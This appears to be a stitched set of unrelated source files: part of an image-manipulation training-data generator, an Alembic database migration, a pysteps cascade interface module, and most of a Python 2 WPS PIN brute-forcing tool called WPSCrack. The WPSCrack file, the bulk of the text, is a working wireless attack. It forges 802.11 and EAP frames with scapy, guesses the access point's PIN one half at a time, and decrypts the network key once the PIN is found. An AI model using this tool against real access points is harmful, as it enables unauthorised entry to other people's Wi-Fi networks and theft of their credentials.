    new_h, new_w = int(np.ceil(h/16.)*16), int(np.ceil(w/16.)*16)
    new_img = np.zeros((new_h, new_w, ch))
    new_img[:h,:w,:] = img
    mask_img = np.zeros_like(new_img)
    duplicate = True
    if duplicate:
        # Source patch: random top-left corner within the upper-left 3/4 of the
        # canvas, side lengths between 10 px and 25% of each dimension.
        dup1_r1 = random.randint(0,np.floor(0.75*new_h))
        dup1_c1 = random.randint(0,np.floor(0.75*new_w))
        dup1_r2 = random.randint(dup1_r1+10, dup1_r1+np.floor(0.25*new_h))
        dup1_c2 = random.randint(dup1_c1+10, dup1_c1+np.floor(0.25*new_w))
        assert np.floor(0.75*new_h)-dup1_r1>=0, 'Negative row for second patch!'
        assert np.floor(0.75*new_w)-dup1_c1>=0, 'Negative col for second patch!'
        augmentation = random.choice(augmentation_list)
        dup2_r1 = random.randint(0, np.floor(0.75*new_h))
        dup2_c1 = random.randint(0, np.floor(0.75*new_w))
        # 90/270 rotations swap the patch's height and width.
        if augmentation in ['0', '180', 'H-Flip', 'V-Flip']:
            dup2_r2 = dup2_r1 + (dup1_r2-dup1_r1)
            dup2_c2 = dup2_c1 + (dup1_c2-dup1_c1)
        else:
            dup2_r2 = dup2_r1 + (dup1_c2-dup1_c1)
            dup2_c2 = dup2_c1 + (dup1_r2-dup1_r1)
        assert dup2_r2<=new_h, 'Second patch row out of bounds!'
        assert dup2_c2<=new_w, 'Second patch col out of bounds!'
        #if random.choice([True, False]):
        #    patch = new_img[dup2_r1:dup2_r2,dup2_c1:dup2_c2,:]
        #    augmented_patch = augment_patch(patch, augmentation)
        #    new_img[dup1_r1:dup1_r2,dup1_c1:dup1_c2,:] = augmented_patch
        #else:
        # Paste the (augmented) source patch over the destination region.
        patch = new_img[dup1_r1:dup1_r2,dup1_c1:dup1_c2,:]
        augmented_patch = augment_patch(patch, augmentation)
        new_img[dup2_r1:dup2_r2,dup2_c1:dup2_c2,:] = augmented_patch
        dup_coord1 = (dup1_r1,dup1_r2,dup1_c1,dup1_c2)
        dup_coord2 = (dup2_r1,dup2_r2,dup2_c1,dup2_c2)
        # Channel 1 marks the source region, channel 0 the pasted copy,
        # channel 2 the untouched background.
        mask_img[dup1_r1:dup1_r2,dup1_c1:dup1_c2,1] = 1
        mask_img[dup2_r1:dup2_r2,dup2_c1:dup2_c2,0] = 1
        mask_img[:,:,2] = 1
        tmp = mask_img[:,:,1] + mask_img[:,:,0]
        tmp[tmp>0] = 1
        mask_img[:,:,2] = mask_img[:,:,2] - tmp
    # Similarity mask: (source-or-copy, background); manipulation mask: (copy, everything else).
    simi_mask = np.concatenate((mask_img[:,:,:1]+mask_img[:,:,1:2], mask_img[:,:,2:3]), axis=-1)
    mani_mask = np.concatenate((mask_img[:,:,:1], mask_img[:,:,1:2]+mask_img[:,:,2:3]), axis=-1)
    return new_img, mask_img, simi_mask, mani_mask
def unmanipulated(img, resize_dim):
    """Pristine sample: resize only, with an all-background ground-truth mask."""
    resized = cv2.resize(img, resize_dim)
    mask = np.zeros_like(resized)
    mask[:, :, 2] = 1  # channel 2 = untouched background
    return resized, mask, mask[:, :, :2], mask[:, :, :2]
def create_manipulation(img, resize_dim, augmentation_list):
    """Randomly produce either a pristine sample or a splice-manipulated one."""
    choice = random.choice(['Pristine', 'Splice'])
    if choice == 'Pristine':
        img, gt_mask, gt_mask1, gt_mask2 = unmanipulated(img, resize_dim)
    elif choice == 'Splice':
        img, gt_mask, gt_mask1, gt_mask2 = create_spliced_manipulation(img, resize_dim, augmentation_list)
    else:
        # Unreachable with the two choices above; kept for safety.
        print('Invalid choice!')
        raise SystemExit
    # Reverse the channel order (BGR -> RGB, presumably -- the images come from cv2).
    img = img[:, :, ::-1]
    return img, gt_mask, gt_mask1, gt_mask2
def data_generation(list_IDs_temp, batch_size, resize_dim, dim, n_channels, augmentation_list):
    'Generates data containing batch_size samples'  # X : (n_samples, *dim, n_channels)
    # Initialization
    X = np.empty((batch_size, dim[0], dim[1], n_channels))
    # y: 3-channel mask; y1/y2: 2-channel similarity / manipulation masks.
    y = np.empty((batch_size, dim[0], dim[1], 3))
    y1 = np.empty((batch_size, dim[0], dim[1], 2))
    y2 = np.empty((batch_size, dim[0], dim[1], 2))

    # Generate data
    for i, ID in enumerate(list_IDs_temp):
        # Store sample; create_manipulation also flips the channel order.
        img = cv2.imread(ID)
        X[i], y[i], y1[i], y2[i] = create_manipulation(img, resize_dim, augmentation_list)

    return X, y, y1, y2
def DataGenerator(image_categories, augmentation_list):
    'Generates data for Keras'
    # Generator parameters are fixed here rather than passed in.
    dim = (256,256)
    resize_dim = (256, 256)
    batch_size = 32
    list_IDs = load_image_paths(image_categories)
    n_channels = 3
    indexes = on_epoch_end(list_IDs)
    # Infinite generator: yield every full batch of the epoch, then reshuffle.
    while True:
        for index in range(length(list_IDs, batch_size)):
            X, y, y1, y2 = get_batch(indexes, index, list_IDs, batch_size, resize_dim, dim, n_channels, augmentation_list)
            # Only (X, y) are consumed by Keras; y1/y2 are discarded here.
            yield (X,y)
        indexes = on_epoch_end(list_IDs)
| StarcoderdataPython |
3269145 | """empty message
Revision ID: a89df01c20eb
Revises:
Create Date: 2019-03-01 18:52:32.627154
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'a89df01c20eb'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Apply this revision: create the db_info and cardstocollections
    tables and add quantity columns to the deck association tables."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('db_info',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('timestamp', sa.DateTime(), nullable=True),
    sa.Column('md5', sa.String(length=128), nullable=True),
    sa.Column('completed', sa.Boolean(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    # Association table: which cards belong to which collection, and how many.
    op.create_table('cardstocollections',
    sa.Column('card_id', sa.Integer(), nullable=True),
    sa.Column('collection_id', sa.Integer(), nullable=True),
    sa.Column('quantity', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['card_id'], ['card.id'], ),
    sa.ForeignKeyConstraint(['collection_id'], ['collection.id'], )
    )
    op.add_column('cardstomainboard', sa.Column('quantity', sa.Integer(), nullable=True))
    op.add_column('cardstosideboard', sa.Column('quantity', sa.Integer(), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    """Revert this revision: drop the quantity columns and the tables
    created in upgrade()."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('cardstosideboard', 'quantity')
    op.drop_column('cardstomainboard', 'quantity')
    op.drop_table('cardstocollections')
    op.drop_table('db_info')
    # ### end Alembic commands ###
# ---- dataset file boundary ----
"""
pysteps.cascade.interface
=========================
Interface for the cascade module.
.. autosummary::
:toctree: ../generated/
get_method
"""
from pysteps.cascade import decomposition, bandpass_filters
# Registry mapping method names to callables.  'fft' maps to a
# (decompose, recompose) pair; the filter entries map to a single callable.
_cascade_methods = dict()
_cascade_methods['fft'] = (decomposition.decomposition_fft, decomposition.recompose_fft)
_cascade_methods['gaussian'] = bandpass_filters.filter_gaussian
_cascade_methods['uniform'] = bandpass_filters.filter_uniform
def get_method(name):
    """
    Return a callable function for the bandpass filter or cascade decomposition
    method corresponding to the given name. For the latter, two functions are
    returned: the first is for the decomposing and the second is for recomposing
    the cascade.

    Filter methods:

    +-------------------+------------------------------------------------------+
    |     Name          |              Description                             |
    +===================+======================================================+
    |  gaussian         | implementation of bandpass filter using Gaussian     |
    |                   | weights                                              |
    +-------------------+------------------------------------------------------+
    |  uniform          | implementation of a filter where all weights are set |
    |                   | to one                                               |
    +-------------------+------------------------------------------------------+

    Decomposition/recomposition methods:

    +-------------------+------------------------------------------------------+
    |     Name          |              Description                             |
    +===================+======================================================+
    |  fft              | decomposition into multiple spatial scales based on  |
    |                   | the fast Fourier Transform (FFT) and a set of        |
    |                   | bandpass filters                                     |
    +-------------------+------------------------------------------------------+
    """
    # Guard clause: only string names are accepted.
    if not isinstance(name, str):
        raise TypeError("Only strings supported for the method's names.\n"
                        + "Available names:"
                        + str(list(_cascade_methods.keys())))
    # Case-insensitive lookup; unknown names report the valid choices.
    method = _cascade_methods.get(name.lower())
    if method is None:
        raise ValueError("Unknown method {}\n".format(name)
                         + "The available methods are:"
                         + str(list(_cascade_methods.keys()))) from None
    return method
# ---- dataset file boundary ----
#!/usr/bin/env python
'''
This software was written by <NAME> <<EMAIL>>
based on the Windows Connect Now - NET spec and code in wpa_supplicant.
Consider this beerware. Prost!
'''
import time, threading, hmac, hashlib, sys, optparse, random
from struct import pack, unpack
from Crypto.Cipher import AES
from scapy.all import *
class WPSCrack:
    """Brute-force a WPS PIN by driving the WSC EAP registration protocol
    (M1..M8) against an access point with raw scapy 802.11 frames."""
    verbose = None
    client_mac = None          # MAC of our (monitor-mode) client interface
    bssid = None               # target AP MAC
    ssid = None
    secret_number = None       # our Diffie-Hellman private exponent
    timeout_time = None        # per-attempt watchdog, in seconds
    pin = None                 # current 8-digit PIN candidate
    # 1536-bit MODP Group from RFC 3526
    prime_str = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1'\
                '29024E088A67CC74020BBEA63B139B22514A08798E3404DD'\
                'EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245'\
                'E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED'\
                'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D'\
                'C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F'\
                '83655D23DCA3AD961C62F356208552BB9ED529077096966D'\
                '670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF'
    prime_int = int(prime_str, 16)
    # Per-attempt handshake progress flags (reset at the top of run()'s loop).
    rcved_auth_response = False
    rcved_asso_response = False
    rcved_eap_request_identity = False
    rcved_m1 = False
    rcved_m3 = False
    rcved_m5 = False
    m4_sent = False
    got_fist_half = False      # (sic) set once the first 4 PIN digits are confirmed
    done = False
    request_EAP_id = 0         # EAP id to echo back in our responses
    last_msg_buffer = ''       # previous WSC payload, for the Authenticator HMAC
    rcved = threading.Event()  # pulsed by the sniffer thread when a reply arrives
    # Session state / derived key material (filled in by gen_keys() et al.).
    ENonce = ''
    RNonce = ''
    PK_E = ''
    PK_R = ''
    EnrolleeMAC = ''
    AuthKey = ''
    KeyWrapKey = ''
    EMSK = ''
    PSK1 = ''
    PSK2 = ''
    E_S1 = ''
    E_S2 = ''
    EHash1 = ''
    EHash2 = ''
    R_S1 = ''
    R_S2 = ''
    RHash1 = ''
    RHash2 = ''                # fixed: original duplicated 'RHash1 = '''
    has_auth_failed = False
    has_timeout = False
    has_retry = False
    # Human-readable names for WSC attribute ids (used by dump_EAP_Expanded).
    # The 0xFF0x keys are pseudo-ids for the raw EAP-Expanded header fields
    # produced by disassemble_EAP_Expanded(has_start=True).
    # Fixed vs. the original: duplicate keys removed and several labels
    # corrected per the Wi-Fi Simple Configuration spec (0x104A = Version,
    # 0x1004 = Authentication Type Flags, 0x100D = Connection Type Flags,
    # 0x103D = R Hash 1); 0x1040 (R-S2, sent in M6) added.
    wps_attributes = {
        0xFF00 : 'Vendor',
        0xFF01 : 'Vendor Type',
        0xFF02 : 'Opcode',
        0xFF03 : 'Flags',
        0x104A : 'Version',
        0x1022 : 'Message Type',
        0x1047 : 'UUID E',
        0x1020 : 'MAC',
        0x101a : 'Enrollee Nonce',
        0x1032 : 'Public Key',
        0x1010 : 'Encryption Type Flags',
        0x100d : 'Connection Type Flags',
        0x1008 : 'Config Methods',
        0x1021 : 'Manufacturer',
        0x1023 : 'Model Name',
        0x1024 : 'Model Number',
        0x1042 : 'Serial Number',
        0x1054 : 'Primary Device Type',
        0x1011 : 'Device Name',
        0x103c : 'RF Bands',
        0x1002 : 'Association State',
        0x1012 : 'Device pin',
        0x1009 : 'Configuration Error',
        0x102d : 'OS Version',
        0x1044 : 'Wifi Protected Setup State',
        0x1004 : 'Authentication Type Flags',
        0x1005 : 'Authenticator',
        0x1048 : 'UUID R',
        0x1039 : 'Registrar Nonce',
        0x1014 : 'E Hash 1',
        0x1015 : 'E Hash 2',
        0x103D : 'R Hash 1',
        0x103E : 'R Hash 2',
        0x1018 : 'Encrypted Settings',
        0x103F : 'R-S1',
        0x1040 : 'R-S2',
        0x101e : 'Key Wrap Algorithm',
        0x1016 : 'E-S1',
        0x1017 : 'E-S2',
        0x1003 : 'Auth Type',
        0x100F : 'Encryption Type',
        0x1027 : 'Network Key',
        0x1028 : 'Network Key Index',
        0x1045 : 'SSID'
    }
    # WSC Message Type (attribute 0x1022) values -> protocol message names.
    wps_message_types = {
        0x04 : 'M1',
        0x05 : 'M2',
        0x07 : 'M3',
        0x08 : 'M4',
        0x09 : 'M5',
        0x0a : 'M6',
        0x0b : 'M7',
        0x0c : 'M8',
        0x0f : 'WSC_DONE',
        0x0e : 'WSC_NACK'
    }
    def run(self):
        """Main brute-force loop: for each PIN candidate, (re)associate with
        the AP and walk the WSC handshake as far as the AP lets us, then pick
        the next candidate via gen_pin().  The sniffer thread sets the
        rcved_* flags and wakes us through the self.rcved event."""
        sniffer_thread = threading.Thread(target=self.sniffer)
        sniffer_thread.start()
        time.sleep(1)
        # Pre-built frames reused on every attempt (only EAP id changes).
        authorization_request = RadioTap() / Dot11(proto=0L, FCfield=0L, subtype=11L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=0L) \
            / Dot11Auth(status=0, seqnum=1, algo=0)
        association_request = RadioTap() / Dot11(proto=0L, FCfield=0L, subtype=0L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=0L) \
            / Dot11AssoReq(listen_interval=5, cap=12548L) \
            / Dot11Elt(info=self.ssid, ID=0, len=len(self.ssid)) \
            / Dot11Elt(info='\x02\x04\x0b\x16\x0c\x12\x18$', ID=1, len=8) \
            / Dot11Elt(info='0H`l', ID=50, len=4) \
            / Dot11Elt(info='\x00P\xf2\x02\x00\x01\x00', ID=221, len=7) \
            / Dot11Elt(info='\x00P\xf2\x04\x10J\x00\x01\x10\x10:\x00\x01\x02', ID=221, len=14)
        # TODO: add 802.11n capabilities
        eapol_start = RadioTap() / Dot11(proto=0L, FCfield=1L, subtype=8L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=2L, ID=0) \
            / Dot11QoS(TID=0L, TXOP=0, Reserved=0L, EOSP=0L) \
            / LLC(dsap=170, ssap=170, ctrl=3) \
            / SNAP(OUI=0, code=34958) \
            / EAPOL(version=1, type=1, len=0)
        response_identity = RadioTap() / Dot11(proto=0L, FCfield=1L, subtype=8L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=2L, ID=0) \
            / Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) \
            / LLC(dsap=170, ssap=170, ctrl=3) \
            / SNAP(OUI=0, code=34958) \
            / EAPOL(version=1, type=0, len=35) \
            / EAP(code=2, type=1, id=0, len=35) \
            / Raw(load='WFA-SimpleConfig-Registrar-1-0')
        i = 0
        while self.done == False:
            if self.done == True:
                break
            # Reset per-attempt handshake progress.
            self.rcved_auth_response = False
            self.rcved_asso_response = False
            self.rcved_eap_request_identity = False
            self.rcved_m1 = False
            self.rcved_m3 = False
            self.rcved_m5 = False
            self.m4_sent = False
            i += 1
            if self.verbose: print '------------------- attempt #%i' % i
            # Watchdog: timeout() sets the event so we never block forever.
            timeout_timer = threading.Timer(self.timeout_time, self.timeout)
            timeout_timer.start()
            self.has_auth_failed = False
            self.has_timeout = False
            self.has_retry = False
            start_time = time.time()
            print 'Trying', self.pin
            self.send_deauth()
            # Each step: clear the event, send, wait for the sniffer thread.
            if self.verbose: print '-> 802.11 authentication request'
            self.rcved.clear()
            sendp(authorization_request, verbose=0)
            self.rcved.wait()
            if self.rcved_auth_response == True:
                if self.verbose: print '-> 802.11 association request'
                self.rcved.clear()
                sendp(association_request, verbose=0)
                self.rcved.wait()
                if self.rcved_asso_response == True:
                    if self.verbose: print '-> EAPOL start'
                    self.rcved.clear()
                    sendp(eapol_start, verbose=0)
                    self.rcved.wait()
                    if self.rcved_eap_request_identity == True:
                        if self.verbose: print '-> EAP response identity'
                        response_identity[EAP].id = self.request_EAP_id
                        self.rcved.clear()
                        sendp(response_identity, verbose=0)
                        self.rcved.wait()
                        if self.rcved_m1 == True:
                            if self.verbose: print '-> M2'
                            self.rcved.clear()
                            self.send_M2()
                            self.rcved.wait()
                            if self.rcved_m3 == True:
                                if self.verbose: print '-> M4'
                                self.rcved.clear()
                                self.send_M4()
                                self.m4_sent = True
                                self.rcved.wait()
                                if self.rcved_m5 == True:
                                    if self.verbose: print '-> M6'
                                    self.rcved.clear()
                                    self.send_M6()
                                    self.rcved.wait()
            self.send_deauth()
            time.sleep(0.05)
            self.rcved.clear()
            timeout_timer.cancel()
            if self.verbose: print 'attempt took %.3f seconds' % (time.time() - start_time)
            self.gen_pin()
def bignum_pack(self, n, l):
return ''.join([(chr((n >> ((l - i - 1) * 8)) % 256)) for i in xrange(l)])
def bignum_unpack(self, byte):
return sum([ord(b) << (8 * i) for i, b in enumerate(byte[::-1])])
def kdf(self, key, personalization_string, el):
x = ''
for i in range (1, (sum(el) + 32 - 1) / 32): # slow
s = pack('!I', i) + personalization_string + pack('!I', sum(el))
x += hmac.new(key, s, hashlib.sha256).digest()
r = []
c = 0
for e in el:
r.append(x[c:c + (e / 8)])
c += e / 8
return r
    def gen_keys(self):
        """Derive the WSC session keys from the enrollee's M1 material.

        Performs the DH exchange (generator 2, RFC 3526 1536-bit group),
        derives AuthKey/KeyWrapKey/EMSK via the WPS KDF, and precomputes the
        registrar proof hashes for the current PIN candidate.
        """
        pubkey_enrollee = self.bignum_unpack(self.PK_E)
        pubkey_registrar = pow(2, self.secret_number, self.prime_int)
        shared_key = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192)
        self.PK_R = self.bignum_pack(pubkey_registrar, 192)
        self.RNonce = os.urandom(16)
        DHKey = hashlib.sha256(shared_key).digest()
        KDK = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest()
        self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256])
        # Registrar secret nonces are irrelevant to the attack, so all-zero
        # values are used instead of real randomness.
        self.R_S1 = '\00' * 16 #random enough
        self.R_S2 = '\00' * 16
        # PSK1/PSK2 commit to the first/second half of the PIN.
        self.PSK1 = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16]
        self.PSK2 = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16]
        self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest()
        self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()
def PKCS5_2_0_pad(self, s):
pad_len = 16 - len(s) % 16;
x = pack('b', pad_len)
s += (x * pad_len)[:pad_len]
return s
    def encrypt(self, lst):
        """AES-CBC-encrypt a TLV list as a WSC 'Encrypted Settings' blob.

        Appends a Key Wrap Authenticator TLV (0x101e, HMAC-SHA256[:8] of the
        plaintext), PKCS#5-pads, and encrypts with KeyWrapKey; IV is all
        zeros.  Returns (iv, ciphertext).
        """
        to_enc_s = self.assemble_EAP_Expanded(lst)
        kwa = hmac.new(self.AuthKey, to_enc_s, hashlib.sha256).digest()[0:8]
        iv = '\00' * 16
        to_enc_s += self.assemble_EAP_Expanded([[0x101e, kwa]])
        plaintext = self.PKCS5_2_0_pad(to_enc_s)
        ciphertext = AES.new(self.KeyWrapKey, AES.MODE_CBC, iv).encrypt(plaintext)
        return iv, ciphertext
    def decrypt(self, iv, ciphertext):
        """Inverse of encrypt(): AES-CBC decrypt with KeyWrapKey, strip the
        PKCS#5 padding, and parse the plaintext back into a TLV list."""
        p = AES.new(self.KeyWrapKey, AES.MODE_CBC, iv).decrypt(ciphertext)
        plaintext = p[:len(p) - ord(p[-1])] # remove padding
        return self.disassemble_EAP_Expanded(plaintext)
    def gen_authenticator(self, msg):
        """Compute the WSC Authenticator attribute: HMAC-SHA256[:8] over the
        previous received message (header stripped via [9:]) concatenated
        with the outgoing message body."""
        return hmac.new(self.AuthKey, self.last_msg_buffer[9:] + msg, hashlib.sha256).digest()[:8]
    def send_M2(self):
        """Build and transmit WSC message M2 (registrar nonce, DH public key
        and mostly-dummy device info), signed with gen_authenticator()."""
        if self.ENonce == '':
            print 'enonce is empty!!!'
        m2 = [
            [0xFF00, '\x00\x37\x2A'],
            [0xFF01, '\x00\x00\x00\x01'],
            [0xFF02, '\x04'],
            [0xFF03, '\x00'],
            [0x104A, '\x10'],
            # message type:
            [0x1022, '\x05'],
            # enrollee nonce:
            [0x101A, self.ENonce],
            # registrar nonce:
            [0x1039, self.RNonce],
            # uuid registrar:
            [0x1048, '\x12\x34\x56\x78\x9A\xBC\xDE\xF0\x12\x34\x56\x78\x9A\xBC\xDE\xF0'],
            # public key:
            [0x1032, self.PK_R],
            [0x1004, '\x00\x3F'],
            [0x1010, '\x00\x0F'],
            [0x100D, '\x01'],
            [0x1008, '\x01\x08'],
            [0x1021, '\x00'],
            [0x1023, '\x00'],
            [0x1024, '\x00'],
            [0x1042, '\x00'],
            [0x1054, '\x00\x00\x00\x00\x00\x00\x00\x00'],
            [0x1011, '\x00'],
            [0x103C, '\x03'],
            [0x1002, '\x00\x00'],
            [0x1009, '\x00\x00'],
            [0x1012, '\x00\x00'],
            [0x102D, '\x80\x00\x00\x00']
        ]
        eap_expanded = self.assemble_EAP_Expanded(m2)
        m = RadioTap() / Dot11(proto=0L, FCfield=1L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, subtype=8L, SC=80, type=2L, ID=55808) \
            / Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) / LLC(dsap=170, ssap=170, ctrl=3) \
            / SNAP(OUI=0, code=34958) \
            / EAPOL(version=1, type=0, len=383) \
            / EAP(code=2, type=254, id=self.request_EAP_id, len=383) \
            / Raw(load=eap_expanded)
        # Authenticator (0x1005) covers the previous message plus this one.
        authenticator = self.gen_authenticator(str(m[Raw])[9:])
        m = m / Raw(load=(self.assemble_EAP_Expanded([[0x1005, authenticator]])))
        sendp(m, verbose=0)
    def send_M4(self):
        """Build and transmit M4: the registrar's proof commitments
        (RHash1/RHash2) plus the encrypted R-S1 secret nonce."""
        ConfigData = [[0x103f, self.R_S1]]
        iv, ciphertext = self.encrypt(ConfigData)
        m4 = [
            [0xFF00, '\x00\x37\x2A'],
            [0xFF01, '\x00\x00\x00\x01'],
            [0xFF02, '\x04'],
            [0xFF03, '\x00'],
            [0x104A, '\x10'],
            [0x1022, '\x08'],
            # ENonce
            [0x101A, self.ENonce],
            # RHash1
            [0x103D, self.RHash1],
            # RHash2
            [0x103E, self.RHash2],
            # Encrypted RS1
            [0x1018, iv + ciphertext]
        ]
        eap_expanded = self.assemble_EAP_Expanded(m4)
        m = RadioTap() / Dot11(proto=0L, FCfield=1L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, subtype=8L, SC=80, type=2L, ID=55808) \
            / Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) \
            / LLC(dsap=170, ssap=170, ctrl=3) \
            / SNAP(OUI=0, code=34958) \
            / EAPOL(version=1, type=0, len=196) \
            / EAP(code=2, type=254, id=self.request_EAP_id, len=196) \
            / Raw(load=eap_expanded)
        authenticator = self.gen_authenticator(str(m[Raw])[9:])
        m = m / Raw(load=(self.assemble_EAP_Expanded([[0x1005, authenticator]])))
        sendp(m, verbose=0)
    def send_M6(self):
        """Build and transmit M6: the encrypted R-S2 secret nonce, proving
        knowledge of the second PIN half."""
        ConfigData = [[0x1040, self.R_S2]]
        iv, ciphertext = self.encrypt(ConfigData)
        m6 = [
            [0xFF00, '\x00\x37\x2A'],
            [0xFF01, '\x00\x00\x00\x01'],
            [0xFF02, '\x04'],
            [0xFF03, '\x00'],
            [0x104A, '\x10'],
            [0x1022, '\x0A'],
            # ENonce
            [0x101A, self.ENonce],
            # Encrypted R_S2
            [0x1018, iv + ciphertext]
        ]
        eap_expanded = self.assemble_EAP_Expanded(m6)
        m = RadioTap() / Dot11(proto=0L, FCfield=1L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, subtype=8L, SC=80, type=2L, ID=55808) \
            / Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) / LLC(dsap=170, ssap=170, ctrl=3) \
            / SNAP(OUI=0, code=34958) / EAPOL(version=1, type=0, len=124) \
            / EAP(code=2, type=254, id=self.request_EAP_id, len=124) / Raw(load=eap_expanded)
        authenticator = self.gen_authenticator(str(m[Raw])[9:])
        m = m / Raw(load=(self.assemble_EAP_Expanded([[0x1005, authenticator]])))
        sendp(m, verbose=0)
def parse_EAP_Expanded(self, l):
d = {}
message_type = None
#performance ?
for e in l:
d[e[0]] = e[1]
if 0x1022 in d:
if ord(d[0x1022]) in self.wps_message_types:
message_type = self.wps_message_types[ord(d[0x1022])]
if self.verbose: print '<-', message_type
else:
print '< unknown Message Type: 0x%X', ord(d[0x1022])
if message_type == 'M1':
self.ENonce = d[0x101a]
self.PK_E = d[0x1032]
self.EnrolleeMAC = d[0x1020]
self.gen_keys()
self.rcved_m1 = True
elif message_type == 'M3':
self.EHash1 = d[0x1014]
self.EHash2 = d[0x1015]
self.rcved_m3 = True
elif message_type == 'M5':
# we could validate the data but it makes no sense
if self.got_fist_half is False:
print 'found first half:', self.pin[0:4]
self.got_fist_half = True
self.rcved_m5 = True
elif message_type == 'M7':
# juice
print '-------------------------- FOUND PIN: %s --------------------------' % self.pin
encrypted = d[0x1018]
x = self.decrypt(encrypted[:16], encrypted[16:])
self.dump_EAP_Expanded(x)
self.done = True
elif message_type == 'WSC_NACK':
if self.m4_sent == True:
self.has_auth_failed = True
nack = [
[0xFF00, '\x00\x37\x2A'],
[0xFF01, '\x00\x00\x00\x01'],
[0xFF02, '\x03'],
[0xFF03, '\x00'],
[0x104A, '\x10'],
[0x1022, '\x0E'],
#
[0x101A, self.ENonce],
[0x1039, self.RNonce],
[0x1009, '\x00\x00']
]
eap_expanded = self.assemble_EAP_Expanded(nack)
m = RadioTap() / Dot11(proto=0L, FCfield=1L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, subtype=8L, SC=80, type=2L, ID=55808) \
/ Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) / LLC(dsap=170, ssap=170, ctrl=3) \
/ SNAP(OUI=0, code=34958) \
/ EAPOL(version=1, type=0, len=70) \
/ EAP(code=2, type=254, id=self.request_EAP_id, len=70) \
/ Raw(load=eap_expanded)
if self.verbose: print '-> WCS_NACK'
sendp(m, verbose=0)
else:
print 'got NACK before M4 - something is wrong'
self.has_retry = True
return
    def sniffer_filter(self, x):
        """scapy stop_filter run on every captured frame.

        Handles frames addressed to us from the target AP, updates the
        rcved_* progress flags and wakes run() via self.rcved; returning
        True stops the capture once the attack is done.
        """
        if (self.done == True):
            return True
        elif (self.rcved.is_set() is False):
            if x.haslayer(Dot11) and x[Dot11].addr1 == self.client_mac and x[Dot11].addr3 == self.bssid:
                if x.haslayer(Dot11Auth) and x[Dot11Auth].status == 0:
                    if self.verbose: print '<- 802.11 authentication response'
                    self.rcved_auth_response = True
                    self.rcved.set()
                elif x.haslayer(Dot11AssoResp) and x[Dot11AssoResp].status == 0:
                    if self.verbose: print '<- 802.11 association response'
                    self.rcved_asso_response = True
                    self.rcved.set()
                elif x.haslayer(EAP) and x[EAP].code == 1:
                    self.request_EAP_id = x[EAP].id
                    if x[EAP].type == 254: #Type: Expanded Type
                        # Keep the raw WSC payload for the next Authenticator
                        # computation, then parse and dispatch it.
                        self.last_msg_buffer = str(x[Raw])[:-4]
                        disasm = self.disassemble_EAP_Expanded(x[Raw], has_FCS=True, has_start=True)
                        self.parse_EAP_Expanded(disasm)
                        self.rcved.set()
                    elif x[EAP].type == 1:
                        if self.verbose: print '<- EAP request identity'
                        if self.rcved_eap_request_identity == False:
                            self.rcved_eap_request_identity = True
                            self.rcved.set()
                    else:
                        print 'got unknown EAP message:'
                        print x.command()
            return False
        else:
            # discard all messages if we don't want to receive
            return False
    def sniffer(self):
        """Background capture thread; sniffer_filter() drives the state
        machine and stops the sniff once the attack finished."""
        print 'sniffer started'
        sniff(store=0, stop_filter=lambda x: self.sniffer_filter(x))
        print 'sniffer stopped'
        sys.exit()
def timeout(self):
print 'TIMEOUT!!'
self.rcved.set()
self.has_timeout = True
def should_continue(self):
if self.has_timeout == True or self.has_auth_failed == True or self.has_retry == True:
return False
else:
return True
    def gen_pin(self):
        """Advance self.pin to the next candidate.

        Before the first half is confirmed, stepping the 7-digit prefix by
        1000 keeps the last three digits fixed and walks the first-half
        space; afterwards it steps by 1 to walk the second half.  The 8th
        digit is recomputed as the standard WPS checksum digit.
        """
        if self.has_timeout == False and self.rcved_m3 == True:
            if self.got_fist_half == True:
                pin_int = int(self.pin[0:7]) + 1
            else:
                pin_int = int(self.pin[0:7]) + 1000
            # append checksum
            accum = 0
            t = pin_int
            while (t):
                accum += 3 * (t % 10)
                t /= 10
                accum += t % 10
                t /= 10
            self.pin = '%07i%01i' % (pin_int, (10 - accum % 10) % 10)
    def send_deauth(self):
        """Send an 802.11 deauthentication frame so the next attempt starts
        from a clean (unassociated) state."""
        if self.verbose: print '-> 802.11 deauthentication'
